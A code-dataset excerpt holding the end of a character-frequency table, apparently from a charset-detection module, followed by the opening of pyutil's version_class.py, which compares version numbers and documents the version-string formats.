3088,2919,1941,1660,2004,1992,2194, 142, 707,1590,1708,1624,1922,1023,1836,1233, # 4016
1004,2313, 789, 741,3620,6179,1609,2411,1200,4127,3719,3720,4666,2057,3721, 593, # 4032
2840, 367,2920,1878,6180,3461,1521, 628,1168, 692,2211,2649, 300, 720,2067,2571, # 4048
2953,3396, 959,2504,3966,3539,3462,1977, 701,6181, 954,1043, 800, 681, 183,3722, # 4064
1803,1730,3540,4128,2103, 815,2314, 174, 467, 230,2454,1093,2134, 755,3541,3397, # 4080
1141,1162,6182,1738,2039, 270,3256,2513,1005,1647,2185,3837, 858,1679,1897,1719, # 4096
2954,2324,1806, 402, 670, 167,4129,1498,2158,2104, 750,6183, 915, 189,1680,1551, # 4112
455,4356,1501,2455, 405,1095,2955, 338,1586,1266,1819, 570, 641,1324, 237,1556, # 4128
2650,1388,3723,6184,1368,2384,1343,1978,3089,2436, 879,3724, 792,1191, 758,3012, # 4144
1411,2135,1322,4357, 240,4667,1848,3725,1574,6185, 420,3045,1546,1391, 714,4358, # 4160
1967, 941,1864, 863, 664, 426, 560,1731,2680,1785,2864,1949,2363, 403,3330,1415, # 4176
1279,2136,1697,2335, 204, 721,2097,3838, 90,6186,2085,2505, 191,3967, 124,2148, # 4192
1376,1798,1178,1107,1898,1405, 860,4359,1243,1272,2375,2983,1558,2456,1638, 113, # 4208
3621, 578,1923,2609, 880, 386,4130, 784,2186,2266,1422,2956,2172,1722, 497, 263, # 4224
2514,1267,2412,2610, 177,2703,3542, 774,1927,1344, 616,1432,1595,1018, 172,4360, # 4240
2325, 911,4361, 438,1468,3622, 794,3968,2024,2173,1681,1829,2957, 945, 895,3090, # 4256
575,2212,2476, 475,2401,2681, 785,2744,1745,2293,2555,1975,3133,2865, 394,4668, # 4272
3839, 635,4131, 639, 202,1507,2195,2766,1345,1435,2572,3726,1908,1184,1181,2457, # 4288
3727,3134,4362, 843,2611, 437, 916,4669, 234, 769,1884,3046,3047,3623, 833,6187, # 4304
1639,2250,2402,1355,1185,2010,2047, 999, 525,1732,1290,1488,2612, 948,1578,3728, # 4320
2413,2477,1216,2725,2159, 334,3840,1328,3624,2921,1525,4132, 564,1056, 891,4363, # 4336
1444,1698,2385,2251,3729,1365,2281,2235,1717,6188, 864,3841,2515, 444, 527,2767, # 4352
2922,3625, 544, 461,6189, 566, 209,2437,3398,2098,1065,2068,3331,3626,3257,2137, # 4368 #last 512
#Everything below is of no interest for detection purpose
2138,2122,3730,2888,1995,1820,1044,6190,6191,6192,6193,6194,6195,6196,6197,6198, # 4384
6199,6200,6201,6202,6203,6204,6205,4670,6206,6207,6208,6209,6210,6211,6212,6213, # 4400
6214,6215,6216,6217,6218,6219,6220,6221,6222,6223,6224,6225,6226,6227,6228,6229, # 4416
6230,6231,6232,6233,6234,6235,6236,6237,3187,6238,6239,3969,6240,6241,6242,6243, # 4432
6244,4671,6245,6246,4672,6247,6248,4133,6249,6250,4364,6251,2923,2556,2613,4673, # 4448
4365,3970,6252,6253,6254,6255,4674,6256,6257,6258,2768,2353,4366,4675,4676,3188, # 4464
4367,3463,6259,4134,4677,4678,6260,2267,6261,3842,3332,4368,3543,6262,6263,6264, # 4480
3013,1954,1928,4135,4679,6265,6266,2478,3091,6267,4680,4369,6268,6269,1699,6270, # 4496
3544,4136,4681,6271,4137,6272,4370,2804,6273,6274,2593,3971,3972,4682,6275,2236, # 4512
4683,6276,6277,4684,6278,6279,4138,3973,4685,6280,6281,3258,6282,6283,6284,6285, # 4528
3974,4686,2841,3975,6286,6287,3545,6288,6289,4139,4687,4140,6290,4141,6291,4142, # 4544
6292,6293,3333,6294,6295,6296,4371,6297,3399,6298,6299,4372,3976,6300,6301,6302, # 4560
4373,6303,6304,3843,3731,6305,4688,4374,6306,6307,3259,2294,6308,3732,2530,4143, # 4576
6309,4689,6310,6311,6312,3048,6313,6314,4690,3733,2237,6315,6316,2282,3334,6317, # 4592
6318,3844,6319,6320,4691,6321,3400,4692,6322,4693,6323,3049,6324,4375,6325,3977, # 4608
6326,6327,6328,3546,6329,4694,3335,6330,4695,4696,6331,6332,6333,6334,4376,3978, # 4624
6335,4697,3979,4144,6336,3980,4698,6337,6338,6339,6340,6341,4699,4700,4701,6342, # 4640
6343,4702,6344,6345,4703,6346,6347,4704,6348,4705,4706,3135,6349,4707,6350,4708, # 4656
6351,4377,6352,4709,3734,4145,6353,2506,4710,3189,6354,3050,4711,3981,6355,3547, # 4672
3014,4146,4378,3735,2651,3845,3260,3136,2224,1986,6356,3401,6357,4712,2594,3627, # 4688
3137,2573,3736,3982,4713,3628,4714,4715,2682,3629,4716,6358,3630,4379,3631,6359, # 4704
6360,6361,3983,6362,6363,6364,6365,4147,3846,4717,6366,6367,3737,2842,6368,4718, # 4720
2628,6369,3261,6370,2386,6371,6372,3738,3984,4719,3464,4720,3402,6373,2924,3336, # 4736
4148,2866,6374,2805,3262,4380,2704,2069,2531,3138,2806,2984,6375,2769,6376,4721, # 4752
4722,3403,6377,6378,3548,6379,6380,2705,3092,1979,4149,2629,3337,2889,6381,3338, # 4768
4150,2557,3339,4381,6382,3190,3263,3739,6383,4151,4723,4152,2558,2574,3404,3191, # 4784
6384,6385,4153,6386,4724,4382,6387,6388,4383,6389,6390,4154,6391,4725,3985,6392, # 4800
3847,4155,6393,6394,6395,6396,6397,3465,6398,4384,6399,6400,6401,6402,6403,6404, # 4816
4156,6405,6406,6407,6408,2123,6409,6410,2326,3192,4726,6411,6412,6413,6414,4385, # 4832
4157,6415,6416,4158,6417,3093,3848,6418,3986,6419,6420,3849,6421,6422,6423,4159, # 4848
6424,6425,4160,6426,3740,6427,6428,6429,6430,3987,6431,4727,6432,2238,6433,6434, # 4864
4386,3988,6435,6436,3632,6437,6438,2843,6439,6440,6441,6442,3633,6443,2958,6444, # 4880
6445,3466,6446,2364,4387,3850,6447,4388,2959,3340,6448,3851,6449,4728,6450,6451, # 4896
3264,4729,6452,3193,6453,4389,4390,2706,3341,4730,6454,3139,6455,3194,6456,3051, # 4912
2124,3852,1602,4391,4161,3853,1158,3854,4162,3989,4392,3990,4731,4732,4393,2040, # 4928
4163,4394,3265,6457,2807,3467,3855,6458,6459,6460,3991,3468,4733,4734,6461,3140, # 4944
2960,6462,4735,6463,6464,6465,6466,4736,4737,4738,4739,6467,6468,4164,2403,3856, # 4960
6469,6470,2770,2844,6471,4740,6472,6473,6474,6475,6476,6477,6478,3195,6479,4741, # 4976
4395,6480,2867,6481,4742,2808,6482,2493,4165,6483,6484,6485,6486,2295,4743,6487, # 4992
6488,6489,3634,6490,6491,6492,6493,6494,6495,6496,2985,4744,6497,6498,4745,6499, # 5008
6500,2925,3141,4166,6501,6502,4746,6503,6504,4747,6505,6506,6507,2890,6508,6509, # 5024
6510,6511,6512,6513,6514,6515,6516,6517,6518,6519,3469,4167,6520,6521,6522,4748, # 5040
4396,3741,4397,4749,4398,3342,2125,4750,6523,4751,4752,4753,3052,6524,2961,4168, # 5056
6525,4754,6526,4755,4399,2926,4169,6527,3857,6528,4400,4170,6529,4171,6530,6531, # 5072
2595,6532,6533,6534,6535,3635,6536,6537,6538,6539,6540,6541,6542,4756,6543,6544, # 5088
6545,6546,6547,6548,4401,6549,6550,6551,6552,4402,3405,4757,4403,6553,6554,6555, # 5104
4172,3742,6556,6557,6558,3992,3636,6559,6560,3053,2726,6561,3549,4173,3054,4404, # 5120
6562,6563,3993,4405,3266,3550,2809,4406,6564,6565,6566,4758,4759,6567,3743,6568, # 5136
4760,3744,4761,3470,6569,6570,6571,4407,6572,3745,4174,6573,4175,2810,4176,3196, # 5152
4762,6574,4177,6575,6576,2494,2891,3551,6577,6578,3471,6579,4408,6580,3015,3197, # 5168
6581,3343,2532,3994,3858,6582,3094,3406,4409,6583,2892,4178,4763,4410,3016,4411, # 5184
6584,3995,3142,3017,2683,6585,4179,6586,6587,4764,4412,6588,6589,4413,6590,2986, # 5200
6591,2962,3552,6592,2963,3472,6593,6594,4180,4765,6595,6596,2225,3267,4414,6597, # 5216
3407,3637,4766,6598,6599,3198,6600,4415,6601,3859,3199,6602,3473,4767,2811,4416, # 5232
1856,3268,3200,2575,3996,3997,3201,4417,6603,3095,2927,6604,3143,6605,2268,6606, # 5248
3998,3860,3096,2771,6607,6608,3638,2495,4768,6609,3861,6610,3269,2745,4769,4181, # 5264
3553,6611,2845,3270,6612,6613,6614,3862,6615,6616,4770,4771,6617,3474,3999,4418, # 5280
4419,6618,3639,3344,6619,4772,4182,6620,2126,6621,6622,6623,4420,4773,6624,3018, # 5296
6625,4774,3554,6626,4183,2025,3746,6627,4184,2707,6628,4421,4422,3097,1775,4185, # 5312
3555,6629,6630,2868,6631,6632,4423,6633,6634,4424,2414,2533,2928,6635,4186,2387, # 5328
6636,4775,6637,4187,6638,1891,4425,3202,3203,6639,6640,4776,6641,3345,6642,6643, # 5344
3640,6644,3475,3346,3641,4000,6645,3144,6646,3098,2812,4188,3642,3204,6647,3863, # 5360
3476,6648,3864,6649,4426,4001,6650,6651,6652,2576,6653,4189,4777,6654,6655,6656, # 5376
2846,6657,3477,3205,4002,6658,4003,6659,3347,2252,6660,6661,6662,4778,6663,6664, # 5392
6665,6666,6667,6668,6669,4779,4780,2048,6670,3478,3099,6671,3556,3747,4004,6672, # 5408
6673,6674,3145,4005,3748,6675,6676,6677,6678,6679,3408,6680,6681,6682,6683,3206, # 5424
3207,6684,6685,4781,4427,6686,4782,4783,4784,6687,6688,6689,4190,6690,6691,3479, # 5440
6692,2746,6693,4428,6694,6695,6696,6697,6698,6699,4785,6700,6701,3208,2727,6702, # 5456
3146,6703,6704,3409,2196,6705,4429,6706,6707,6708,2534,1996,6709,6710,6711,2747, # 5472
6712,6713,6714,4786,3643,6715,4430,4431,6716,3557,6717,4432,4433,6718,6719,6720, # 5488
6721,3749,6722,4006,4787,6723,6724,3644,4788,4434,6725,6726,4789,2772,6727,6728, # 5504
6729,6730,6731,2708,3865,2813,4435,6732,6733,4790,4791,3480,6734,6735,6736,6737, # 5520
4436,3348,6738,3410,4007,6739,6740,4008,6741,6742,4792,3411,4191,6743,6744,6745, # 5536
6746,6747,3866,6748,3750,6749,6750,6751,6752,6753,6754,6755,3867,6756,4009,6757, # 5552
4793,4794,6758,2814,2987,6759,6760,6761,4437,6762,6763,6764,6765,3645,6766,6767, # 5568
3481,4192,6768,3751,6769,6770,2174,6771,3868,3752,6772,6773,6774,4193,4795,4438, # 5584
3558,4796,4439,6775,4797,6776,6777,4798,6778,4799,3559,4800,6779,6780,6781,3482, # 5600
6782,2893,6783,6784,4194,4801,4010,6785,6786,4440,6787,4011,6788,6789,6790,6791, # 5616
6792,6793,4802,6794,6795,6796,4012,6797,6798,6799,6800,3349,4803,3483,6801,4804, # 5632
4195,6802,4013,6803,6804,4196,6805,4014,4015,6806,2847,3271,2848,6807,3484,6808, # 5648
6809,6810,4441,6811,4442,4197,4443,3272,4805,6812,3412,4016,1579,6813,6814,4017, # 5664
6815,3869,6816,2964,6817,4806,6818,6819,4018,3646,6820,6821,4807,4019,4020,6822, # 5680
6823,3560,6824,6825,4021,4444,6826,4198,6827,6828,4445,6829,6830,4199,4808,6831, # 5696
6832,6833,3870,3019,2458,6834,3753,3413,3350,6835,4809,3871,4810,3561,4446,6836, # 5712
6837,4447,4811,4812,6838,2459,4448,6839,4449,6840,6841,4022,3872,6842,4813,4814, # 5728
6843,6844,4815,4200,4201,4202,6845,4023,6846,6847,4450,3562,3873,6848,6849,4816, # 5744
4817,6850,4451,4818,2139,6851,3563,6852,6853,3351,6854,6855,3352,4024,2709,3414, # 5760
4203,4452,6856,4204,6857,6858,3874,3875,6859,6860,4819,6861,6862,6863,6864,4453, # 5776
3647,6865,6866,4820,6867,6868,6869,6870,4454,6871,2869,6872,6873,4821,6874,3754, # 5792
6875,4822,4205,6876,6877,6878,3648,4206,4455,6879,4823,6880,4824,3876,6881,3055, # 5808
4207,6882,3415,6883,6884,6885,4208,4209,6886,4210,3353,6887,3354,3564,3209,3485, # 5824
2652,6888,2728,6889,3210,3755,6890,4025,4456,6891,4825,6892,6893,6894,6895,4211, # 5840
6896,6897,6898,4826,6899,6900,4212,6901,4827,6902,2773,3565,6903,4828,6904,6905, # 5856
6906,6907,3649,3650,6908,2849,3566,6909,3567,3100,6910,6911,6912,6913,6914,6915, # 5872
4026,6916,3355,4829,3056,4457,3756,6917,3651,6918,4213,3652,2870,6919,4458,6920, # 5888
2438,6921,6922,3757,2774,4830,6923,3356,4831,4832,6924,4833,4459,3653,2507,6925, # 5904
4834,2535,6926,6927,3273,4027,3147,6928,3568,6929,6930,6931,4460,6932,3877,4461, # 5920
2729,3654,6933,6934,6935,6936,2175,4835,2630,4214,4028,4462,4836,4215,6937,3148, # 5936
4216,4463,4837,4838,4217,6938,6939,2850,4839,6940,4464,6941,6942,6943,4840,6944, # 5952
4218,3274,4465,6945,6946,2710,6947,4841,4466,6948,6949,2894,6950,6951,4842,6952, # 5968
4219,3057,2871,6953,6954,6955,6956,4467,6957,2711,6958,6959,6960,3275,3101,4843, # 5984
6961,3357,3569,6962,4844,6963,6964,4468,4845,3570,6965,3102,4846,3758,6966,4847, # 6000
3878,4848,4849,4029,6967,2929,3879,4850,4851,6968,6969,1733,6970,4220,6971,6972, # 6016
6973,6974,6975,6976,4852,6977,6978,6979,6980,6981,6982,3759,6983,6984,6985,3486, # 6032
3487,6986,3488,3416,6987,6988,6989,6990,6991,6992,6993,6994,6995,6996,6997,4853, # 6048
6998,6999,4030,7000,7001,3211,7002,7003,4221,7004,7005,3571,4031,7006,3572,7007, # 6064
2614,4854,2577,7008,7009,2965,3655,3656,4855,2775,3489,3880,4222,4856,3881,4032, # 6080
3882,3657,2730,3490,4857,7010,3149,7011,4469,4858,2496,3491,4859,2283,7012,7013, # 6096
7014,2365,4860,4470,7015,7016,3760,7017,7018,4223,1917,7019,7020,7021,4471,7022, # 6112
2776,4472,7023,7024,7025,7026,4033,7027,3573,4224,4861,4034,4862,7028,7029,1929, # 6128
3883,4035,7030,4473,3058,7031,2536,3761,3884,7032,4036,7033,2966,2895,1968,4474, # 6144
3276,4225,3417,3492,4226,2105,7034,7035,1754,2596,3762,4227,4863,4475,3763,4864, # 6160
3764,2615,2777,3103,3765,3658,3418,4865,2296,3766,2815,7036,7037,7038,3574,2872, # 6176
3277,4476,7039,4037,4477,7040,7041,4038,7042,7043,7044,7045,7046,7047,2537,7048, # 6192
7049,7050,7051,7052,7053,7054,4478,7055,7056,3767,3659,4228,3575,7057,7058,4229, # 6208
7059,7060,7061,3660,7062,3212,7063,3885,4039,2460,7064,7065,7066,7067,7068,7069, # 6224
7070,7071,7072,7073,7074,4866,3768,4867,7075,7076,7077,7078,4868,3358,3278,2653, # 6240
7079,7080,4479,3886,7081,7082,4869,7083,7084,7085,7086,7087,7088,2538,7089,7090, # 6256
7091,4040,3150,3769,4870,4041,2896,3359,4230,2930,7092,3279,7093,2967,4480,3213, # 6272
4481,3661,7094,7095,7096,7097,7098,7099,7100,7101,7102,2461,3770,7103,7104,4231, # 6288
3151,7105,7106,7107,4042,3662,7108,7109,4871,3663,4872,4043,3059,7110,7111,7112, # 6304
3493,2988,7113,4873,7114,7115,7116,3771,4874,7117,7118,4232,4875,7119,3576,2336, # 6320
4876,7120,4233,3419,4044,4877,4878,4482,4483,4879,4484,4234,7121,3772,4880,1045, # 6336
3280,3664,4881,4882,7122,7123,7124,7125,4883,7126,2778,7127,4485,4486,7128,4884, # 6352
3214,3887,7129,7130,3215,7131,4885,4045,7132,7133,4046,7134,7135,7136,7137,7138, # 6368
7139,7140,7141,7142,7143,4235,7144,4886,7145,7146,7147,4887,7148,7149,7150,4487, # 6384
4047,4488,7151,7152,4888,4048,2989,3888,7153,3665,7154,4049,7155,7156,7157,7158, # 6400
7159,7160,2931,4889,4890,4489,7161,2631,3889,4236,2779,7162,7163,4891,7164,3060, # 6416
7165,1672,4892,7166,4893,4237,3281,4894,7167,7168,3666,7169,3494,7170,7171,4050, # 6432
7172,7173,3104,3360,3420,4490,4051,2684,4052,7174,4053,7175,7176,7177,2253,4054, # 6448
7178,7179,4895,7180,3152,3890,3153,4491,3216,7181,7182,7183,2968,4238,4492,4055, # 6464
7184,2990,7185,2479,7186,7187,4493,7188,7189,7190,7191,7192,4896,7193,4897,2969, # 6480
4494,4898,7194,3495,7195,7196,4899,4495,7197,3105,2731,7198,4900,7199,7200,7201, # 6496
4056,7202,3361,7203,7204,4496,4901,4902,7205,4497,7206,7207,2315,4903,7208,4904, # 6512
7209,4905,2851,7210,7211,3577,7212,3578,4906,7213,4057,3667,4907,7214,4058,2354, # 6528
3891,2376,3217,3773,7215,7216,7217,7218,7219,4498,7220,4908,3282,2685,7221,3496, # 6544
4909,2632,3154,4910,7222,2337,7223,4911,7224,7225,7226,4912,4913,3283,4239,4499, # 6560
7227,2816,7228,7229,7230,7231,7232,7233,7234,4914,4500,4501,7235,7236,7237,2686, # 6576
7238,4915,7239,2897,4502,7240,4503,7241,2516,7242,4504,3362,3218,7243,7244,7245, # 6592
4916,7246,7247,4505,3363,7248,7249,7250,7251,3774,4506,7252,7253,4917,7254,7255, # 6608
3284,2991,4918,4919,3219,3892,4920,3106,3497,4921,7256,7257,7258,4922,7259,4923, # 6624
3364,4507,4508,4059,7260,4240,3498,7261,7262,4924,7263,2992,3893,4060,3220,7264, # 6640
7265,7266,7267,7268,7269,4509,3775,7270,2817,7271,4061,4925,4510,3776,7272,4241, # 6656
4511,3285,7273,7274,3499,7275,7276,7277,4062,4512,4926,7278,3107,3894,7279,7280, # 6672
4927,7281,4513,7282,7283,3668,7284,7285,4242,4514,4243,7286,2058,4515,4928,4929, # 6688
4516,7287,3286,4244,7288,4517,7289,7290,7291,3669,7292,7293,4930,4931,4932,2355, # 6704
4933,7294,2633,4518,7295,4245,7296,7297,4519,7298,7299,4520,4521,4934,7300,4246, # 6720
4522,7301,7302,7303,3579,7304,4247,4935,7305,4936,7306,7307,7308,7309,3777,7310, # 6736
4523,7311,7312,7313,4248,3580,7314,4524,3778,4249,7315,3581,7316,3287,7317,3221, # 6752
7318,4937,7319,7320,7321,7322,7323,7324,4938,4939,7325,4525,7326,7327,7328,4063, # 6768
7329,7330,4940,7331,7332,4941,7333,4526,7334,3500,2780,1741,4942,2026,1742,7335, # 6784
7336,3582,4527,2388,7337,7338,7339,4528,7340,4250,4943,7341,7342,7343,4944,7344, # 6800
7345,7346,3020,7347,4945,7348,7349,7350,7351,3895,7352,3896,4064,3897,7353,7354, # 6816
7355,4251,7356,7357,3898,7358,3779,7359,3780,3288,7360,7361,4529,7362,4946,4530, # 6832
2027,7363,3899,4531,4947,3222,3583,7364,4948,7365,7366,7367,7368,4949,3501,4950, # 6848
3781,4951,4532,7369,2517,4952,4252,4953,3155,7370,4954,4955,4253,2518,4533,7371, # 6864
7372,2712,4254,7373,7374,7375,3670,4956,3671,7376,2389,3502,4065,7377,2338,7378, # 6880
7379,7380,7381,3061,7382,4957,7383,7384,7385,7386,4958,4534,7387,7388,2993,7389, # 6896
3062,7390,4959,7391,7392,7393,4960,3108,4961,7394,4535,7395,4962,3421,4536,7396, # 6912
4963,7397,4964,1857,7398,4965,7399,7400,2176,3584,4966,7401,7402,3422,4537,3900, # 6928
3585,7403,3782,7404,2852,7405,7406,7407,4538,3783,2654,3423,4967,4539,7408,3784, # 6944
3586,2853,4540,4541,7409,3901,7410,3902,7411,7412,3785,3109,2327,3903,7413,7414, # 6960
2970,4066,2932,7415,7416,7417,3904,3672,3424,7418,4542,4543,4544,7419,4968,7420, # 6976
7421,4255,7422,7423,7424,7425,7426,4067,7427,3673,3365,4545,7428,3110,2559,3674, # 6992
7429,7430,3156,7431,7432,3503,7433,3425,4546,7434,3063,2873,7435,3223,4969,4547, # 7008
4548,2898,4256,4068,7436,4069,3587,3786,2933,3787,4257,4970,4971,3788,7437,4972, # 7024
3064,7438,4549,7439,7440,7441,7442,7443,4973,3905,7444,2874,7445,7446,7447,7448, # 7040
3021,7449,4550,3906,3588,4974,7450,7451,3789,3675,7452,2578,7453,4070,7454,7455, # 7056
7456,4258,3676,7457,4975,7458,4976,4259,3790,3504,2634,4977,3677,4551,4260,7459, # 7072
7460,7461,7462,3907,4261,4978,7463,7464,7465,7466,4979,4980,7467,7468,2213,4262, # 7088
7469,7470,7471,3678,4981,7472,2439,7473,4263,3224,3289,7474,3908,2415,4982,7475, # 7104
4264,7476,4983,2655,7477,7478,2732,4552,2854,2875,7479,7480,4265,7481,4553,4984, # 7120
7482,7483,4266,7484,3679,3366,3680,2818,2781,2782,3367,3589,4554,3065,7485,4071, # 7136
2899,7486,7487,3157,2462,4072,4555,4073,4985,4986,3111,4267,2687,3368,4556,4074, # 7152
3791,4268,7488,3909,2783,7489,2656,1962,3158,4557,4987,1963,3159,3160,7490,3112, # 7168
4988,4989,3022,4990,4991,3792,2855,7491,7492,2971,4558,7493,7494,4992,7495,7496, # 7184
7497,7498,4993,7499,3426,4559,4994,7500,3681,4560,4269,4270,3910,7501,4075,4995, # 7200
4271,7502,7503,4076,7504,4996,7505,3225,4997,4272,4077,2819,3023,7506,7507,2733, # 7216
4561,7508,4562,7509,3369,3793,7510,3590,2508,7511,7512,4273,3113,2994,2616,7513, # 7232
7514,7515,7516,7517,7518,2820,3911,4078,2748,7519,7520,4563,4998,7521,7522,7523, # 7248
7524,4999,4274,7525,4564,3682,2239,4079,4565,7526,7527,7528,7529,5000,7530,7531, # 7264
5001,4275,3794,7532,7533,7534,3066,5002,4566,3161,7535,7536,4080,7537,3162,7538, # 7280
7539,4567,7540,7541,7542,7543,7544,7545,5003,7546,4568,7547,7548,7549,7550,7551, # 7296
7552,7553,7554,7555,7556,5004,7557,7558,7559,5005,7560,3795,7561,4569,7562,7563, # 7312
7564,2821,3796,4276,4277,4081,7565,2876,7566,5006,7567,7568,2900,7569,3797,3912, # 7328
7570,7571,7572,4278,7573,7574,7575,5007,7576,7577,5008,7578,7579,4279,2934,7580, # 7344
7581,5009,7582,4570,7583,4280,7584,7585,7586,4571,4572,3913,7587,4573,3505,7588, # 7360
5010,7589,7590,7591,7592,3798,4574,7593,7594,5011,7595,4281,7596,7597,7598,4282, # 7376
5012,7599,7600,5013,3163,7601,5014,7602,3914,7603,7604,2734,4575,4576,4577,7605, # 7392
7606,7607,7608,7609,3506,5015,4578,7610,4082,7611,2822,2901,2579,3683,3024,4579, # 7408
3507,7612,4580,7613,3226,3799,5016,7614,7615,7616,7617,7618,7619,7620,2995,3290, # 7424
7621,4083,7622,5017,7623,7624,7625,7626,7627,4581,3915,7628,3291,7629,5018,7630, # 7440
7631,7632,7633,4084,7634,7635,3427,3800,7636,7637,4582,7638,5019,4583,5020,7639, # 7456
3916,7640,3801,5021,4584,4283,7641,7642,3428,3591,2269,7643,2617,7644,4585,3592, # 7472
7645,4586,2902,7646,7647,3227,5022,7648,4587,7649,4284,7650,7651,7652,4588,2284, # 7488
7653,5023,7654,7655,7656,4589,5024,3802,7657,7658,5025,3508,4590,7659,7660,7661, # 7504
1969,5026,7662,7663,3684,1821,2688,7664,2028,2509,4285,7665,2823,1841,7666,2689, # 7520
3114,7667,3917,4085,2160,5027,5028,2972,7668,5029,7669,7670,7671,3593,4086,7672, # 7536
4591,4087,5030,3803,7673,7674,7675,7676,7677,7678,7679,4286,2366,4592,4593,3067, # 7552
2328,7680,7681,4594,3594,3918,2029,4287,7682,5031,3919,3370,4288,4595,2856,7683, # 7568
3509,7684,7685,5032,5033,7686,7687,3804,2784,7688,7689,7690,7691,3371,7692,7693, # 7584
2877,5034,7694,7695,3920,4289,4088,7696,7697,7698,5035,7699,5036,4290,5037,5038, # 7600
5039,7700,7701,7702,5040,5041,3228,7703,1760,7704,5042,3229,4596,2106,4089,7705, # 7616
4597,2824,5043,2107,3372,7706,4291,4090,5044,7707,4091,7708,5045,3025,3805,4598, # 7632
4292,4293,4294,3373,7709,4599,7710,5046,7711,7712,5047,5048,3806,7713,7714,7715, # 7648
5049,7716,7717,7718,7719,4600,5050,7720,7721,7722,5051,7723,4295,3429,7724,7725, # 7664
7726,7727,3921,7728,3292,5052,4092,7729,7730,7731,7732,7733,7734,7735,5053,5054, # 7680
7736,7737,7738,7739,3922,3685,7740,7741,7742,7743,2635,5055,7744,5056,4601,7745, # 7696
7746,2560,7747,7748,7749,7750,3923,7751,7752,7753,7754,7755,4296,2903,7756,7757, # 7712
7758,7759,7760,3924,7761,5057,4297,7762,7763,5058,4298,7764,4093,7765,7766,5059, # 7728
3925,7767,7768,7769,7770,7771,7772,7773,7774,7775,7776,3595,7777,4299,5060,4094, # 7744
7778,3293,5061,7779,7780,4300,7781,7782,4602,7783,3596,7784,7785,3430,2367,7786, # 7760
3164,5062,5063,4301,7787,7788,4095,5064,5065,7789,3374,3115,7790,7791,7792,7793, # 7776
7794,7795,7796,3597,4603,7797,7798,3686,3116,3807,5066,7799,7800,5067,7801,7802, # 7792
4604,4302,5068,4303,4096,7803,7804,3294,7805,7806,5069,4605,2690,7807,3026,7808, # 7808
7809,7810,7811,7812,7813,7814,7815,7816,7817,7818,7819,7820,7821,7822,7823,7824, # 7824
7825,7826,7827,7828,7829,7830,7831,7832,7833,7834,7835,7836,7837,7838,7839,7840, # 7840
7841,7842,7843,7844,7845,7846,7847,7848,7849,7850,7851,7852,7853,7854,7855,7856, # 7856
7857,7858,7859,7860,7861,7862,7863,7864,7865,7866,7867,7868,7869,7870,7871,7872, # 7872
7873,7874,7875,7876,7877,7878,7879,7880,7881,7882,7883,7884,7885,7886,7887,7888, # 7888
7889,7890,7891,7892,7893,7894,7895,7896,7897,7898,7899,7900,7901,7902,7903,7904, # 7904
7905,7906,7907,7908,7909,7910,7911,7912,7913,7914,7915,7916,7917,7918,7919,7920, # 7920
7921,7922,7923,7924,3926,7925,7926,7927,7928,7929,7930,7931,7932,7933,7934,7935, # 7936
7936,7937,7938,7939,7940,7941,7942,7943,7944,7945,7946,7947,7948,7949,7950,7951, # 7952
7952,7953,7954,7955,7956,7957,7958,7959,7960,7961,7962,7963,7964,7965,7966,7967, # 7968
7968,7969,7970,7971,7972,7973,7974,7975,7976,7977,7978,7979,7980,7981,7982,7983, # 7984
7984,7985,7986,7987,7988,7989,7990,7991,7992,7993,7994,7995,7996,7997,7998,7999, # 8000
8000,8001,8002,8003,8004,8005,8006,8007,8008,8009,8010,8011,8012,8013,8014,8015, # 8016
8016,8017,8018,8019,8020,8021,8022,8023,8024,8025,8026,8027,8028,8029,8030,8031, # 8032
8032,8033,8034,8035,8036,8037,8038,8039,8040,8041,8042,8043,8044,8045,8046,8047, # 8048
8048,8049,8050,8051,8052,8053,8054,8055,8056,8057,8058,8059,8060,8061,8062,8063, # 8064
8064,8065,8066,8067,8068,8069,8070,8071,8072,8073,8074,8075,8076,8077,8078,8079, # 8080
8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095, # 8096
8096,8097,8098,8099,8100,8101,8102,8103,8104,8105,8106,8107,8108,8109,8110,8111, # 8112
8112,8113,8114,8115,8116,8117,8118,8119,8120,8121,8122,8123,8124,8125,8126,8127, # 8128
8128,8129,8130,8131,8132,8133,8134,8135,8136,8137,8138,8139,8140,8141,8142,8143, # 8144
8144,8145,8146,8147,8148,8149,8150,8151,8152,8153,8154,8155,8156,8157,8158,8159, # 8160
8160,8161,8162,8163,8164,8165,8166,8167,8168,8169,8170,8171,8172,8173,8174,8175, # 8176
8176,8177,8178,8179,8180,8181,8182,8183,8184,8185,8186,8187,8188,8189,8190,8191, # 8192
8192,8193,8194,8195,8196,8197,8198,8199,8200,8201,8202,8203,8204,8205,8206,8207, # 8208
8208,8209,8210,8211,8212,8213,8214,8215,8216,8217,8218,8219,8220,8221,8222,8223, # 8224
8224,8225,8226,8227,8228,8229,8230,8231,8232,8233,8234,8235,8236,8237,8238,8239, # 8240
8240,8241,8242,8243,8244,8245,8246,8247,8248,8249,8250,8251,8252,8253,8254,8255, # 8256
8256,8257,8258,8259,8260,8261,8262,8263,8264,8265,8266,8267,8268,8269,8270,8271) # 8272
# flake8: noqa
| gpl-3.0 |
Nikoala/CouchPotatoServer | libs/pyutil/version_class.py | 106 | 5299 | # -*- coding: utf-8 -*-
# Copyright (c) 2004-2010 Zooko Wilcox-O'Hearn
# This file is part of pyutil; see README.rst for licensing terms.
"""
extended version number class
"""
# verlib a.k.a. distutils.version by Tarek Ziadé.
from pyutil.verlib import NormalizedVersion
def cmp_version(v1, v2):
return cmp(NormalizedVersion(str(v1)), NormalizedVersion(str(v2)))
# Python Standard Library
import re
# End users see version strings like this:
# "1.0.0"
# ^ ^ ^
# | | |
# | | '- micro version number
# | '- minor version number
# '- major version number
# The first number is "major version number". The second number is the "minor
# version number" -- it gets bumped whenever we make a new release that adds or
# changes functionality. The third version is the "micro version number" -- it
# gets bumped whenever we make a new release that doesn't add or change
# functionality, but just fixes bugs (including performance issues).
# Early-adopter end users see version strings like this:
# "1.0.0a1"
# ^ ^ ^^^
# | | |||
# | | ||'- release number
# | | |'- a=alpha, b=beta, c=release candidate, or none
# | | '- micro version number
# | '- minor version number
# '- major version number
# The optional "a" or "b" stands for "alpha release" or "beta release"
# respectively. The number after "a" or "b" gets bumped every time we
# make a new alpha or beta release. This has the same form and the same
# meaning as version numbers of releases of Python.
# Developers see "full version strings", like this:
# "1.0.0a1-55"
# ^ ^ ^^^ ^
# | | ||| |
# | | ||| '- nano version number
# | | ||'- release number
# | | |'- a=alpha, b=beta, c=release candidate or none
# | | '- micro version number
# | '- minor version number
# '- major version number
# or else like this:
# "1.0.0a1-r22155"
# ^ ^ ^^^ ^
# | | ||| |
# | | ||| '- revision number
# | | ||'- release number
